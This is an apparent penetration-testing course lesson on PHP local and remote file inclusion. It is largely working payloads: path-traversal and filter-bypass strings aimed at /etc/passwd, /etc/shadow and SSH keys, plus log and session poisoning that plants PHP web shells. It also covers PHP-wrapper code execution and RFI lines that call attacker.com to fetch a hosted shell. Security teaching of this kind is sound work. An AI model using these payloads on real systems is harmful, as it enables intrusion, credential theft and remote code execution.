Nerd Level Tech logo
|
Lesson 15 of 24

Web Application Attacks

File Inclusion Vulnerabilities (LFI/RFI)

5 min read

File inclusion vulnerabilities allow attackers to read sensitive files or execute malicious code. These are commonly found in PHP applications.

Understanding File Inclusion

Local File Inclusion (LFI)

LFI allows reading files from the local server:

// Vulnerable code
<?php include($_GET['page']); ?>

// Normal use
https://target.com/index.php?page=about.php

// LFI attack
https://target.com/index.php?page=../../../etc/passwd

Remote File Inclusion (RFI)

RFI allows including files from remote servers:

// Vulnerable code (requires allow_url_include=On)
<?php include($_GET['page']); ?>

// RFI attack
https://target.com/index.php?page=http://attacker.com/shell.php

Basic LFI Testing

Path Traversal

?page=../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252f..%252fetc%252fpasswd
?page=/etc/passwd

Null Byte Bypass (PHP < 5.3.4)

?page=../../../etc/passwd%00
?page=../../../etc/passwd%00.php

Common Files to Read

Linux:

/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/self/environ
/proc/self/cmdline
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/auth.log
/home/user/.ssh/id_rsa
/home/user/.bash_history

Windows:

C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\xampp\apache\logs\access.log

Application-Specific Files

# Web configs
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess

# Apache
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf

# Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default

LFI to Remote Code Execution

Log Poisoning

Step 1: Poison the log

# Apache access log
curl "http://target.com" -A "<?php system(\$_GET['cmd']); ?>"

# Or via netcat
nc target.com 80
GET /<?php system($_GET['cmd']); ?> HTTP/1.1
Host: target.com

Step 2: Include the poisoned log

?page=../../../var/log/apache2/access.log&cmd=id
?page=../../../var/log/apache2/error.log&cmd=id

SSH Log Poisoning

# Poison auth.log via SSH
ssh '<?php system($_GET["cmd"]); ?>'@target.com

# Include the log
?page=../../../var/log/auth.log&cmd=id

PHP Session Poisoning

# Sessions stored in /tmp/sess_<PHPSESSID>
# Inject PHP code into a session variable

# Include session file
?page=../../../tmp/sess_<your_session_id>

/proc/self/environ

# If User-Agent is logged to environ
curl "http://target.com/vuln.php?page=../../../proc/self/environ" -A "<?php system('id'); ?>"

PHP Wrappers

php://filter (Read Source Code)

# Read PHP source as base64
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/convert.base64-encode/resource=index.php

# Decode output
echo "base64_output" | base64 -d

php://input (RCE if allow_url_include=On)

# POST PHP code
curl -X POST "http://target.com/vuln.php?page=php://input" --data "<?php system('id'); ?>"

data:// (RCE if allow_url_include=On)

?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

zip:// Wrapper

# Create malicious zip
echo "<?php system('id'); ?>" > shell.php
zip shell.zip shell.php

# Upload zip then include
?page=zip://uploads/shell.zip%23shell.php

phar:// Wrapper

?page=phar://uploads/shell.phar/shell.php

Bypassing Filters

Extension Filters

?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252f..%252fetc%252fpasswd (double encoding)
?page=....\/....\/....\/etc/passwd
?page=/var/www/html/../../../etc/passwd

Path Truncation (PHP < 5.3)

# PHP max path length is 4096 bytes
?page=../../../etc/passwd/./././././<repeat until 4096>

Remote File Inclusion

Basic RFI

?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.php
?page=ftp://attacker.com/shell.php

RFI Bypasses

# Null byte
?page=http://attacker.com/shell.txt%00

# Double URL encode
?page=http%253A%252F%252Fattacker.com%252Fshell.txt

Hosting the Payload

# On attacker machine
echo "<?php system(\$_GET['cmd']); ?>" > shell.txt
python3 -m http.server 80

# Trigger RFI
http://target.com/vuln.php?page=http://attacker-ip/shell.txt&cmd=id

LFI/RFI Testing Workflow

1. Identify file inclusion points
   └── Parameters like page=, file=, include=

2. Test for basic LFI
   └── ../../../etc/passwd

3. Try bypass techniques
   └── Encoding, null bytes, path truncation

4. Test PHP wrappers
   └── php://filter for source code

5. Attempt RCE via LFI
   └── Log poisoning, PHP wrappers

6. Test for RFI
   └── Only if allow_url_include=On

Next, we'll cover file upload vulnerabilities and bypasses. :::

Quiz

Module 4: Web Application Attacks

Take Quiz